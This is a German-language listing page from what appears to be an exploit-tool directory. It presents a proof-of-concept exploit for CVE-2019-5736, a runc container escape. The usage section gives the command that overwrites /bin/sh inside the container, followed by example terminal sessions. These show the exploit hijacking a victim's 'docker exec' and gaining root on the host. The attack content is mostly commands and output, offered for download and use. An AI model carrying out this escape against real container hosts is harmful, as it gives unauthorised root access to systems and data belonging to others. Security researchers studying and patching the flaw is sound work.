Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/billith/cve-2019-5736-poc
Privilege EscalationSchwachstellenanalyseExploitationPenetrationstestsRed TeamingContainer-Ausbruch
GitHubbillith/cve-2019-5736-poc

CVE-2019-5736-PoC

Proof-of-Concept-Exploit für CVE-2019-5736, einen runc-Containerausbruch, der die runc-Binärdatei des Hosts überschreibt, um eine Root-Codeausführung auf dem Host zu erreichen.

Repository anzeigen
6vor 6 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Verwendung

Der Proof-of-Concept wurde für das Szenario erstellt, in dem das Opfer z.B. docker exec <container> sh ausführt. Vor dem Ausführen des Exploits muss die sh-Binärdatei im Container-Dateisystem überschrieben werden:

root@kitploit:~
printf '#!/proc/self/exe' > /bin/sh

Danach, wenn das Opfer den exec-Befehl ausführt, sollte die runc-Binärdatei im Host-Dateisystem mit dem im Exploit definierten Code überschrieben werden.

Beispiel

Container-Terminal:

root@kitploit:~
root@cebad431c120:/# printf '#!/proc/self/exe' > /bin/sh
root@cebad431c120:/# ./exp  # Waits until victim issues the exec command
Found process: 42851
Exploiting PID: /proc/42851/exe
Time to PWN
Success! Next time runc is run we will get RCE!
root@cebad431c120:/# 

Opfer-Terminal:

root@kitploit:~
user@server:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
user@server:~$ sudo docker exec cebad431c120 sh
No help topic for '/usr/bin/sh'
user@server:~$ sudo docker exec cebad431c120 sh
pwned
uid=0(root) gid=0(root) groups=0(root)
failed to retrieve OCI runtime exec pid: open /run/containerd/io.containerd.runtime.v1.linux/moby/cebad431c120d2378925e0712efaafe844616d618d99df4a479283d45f86c0fc/a70ea68c10e0eb3912fde8978e879e77b04ed32731338329024140db47dce1d3.pid: no such file or directory: unknown
user@server:~$ 
Tool herunterladen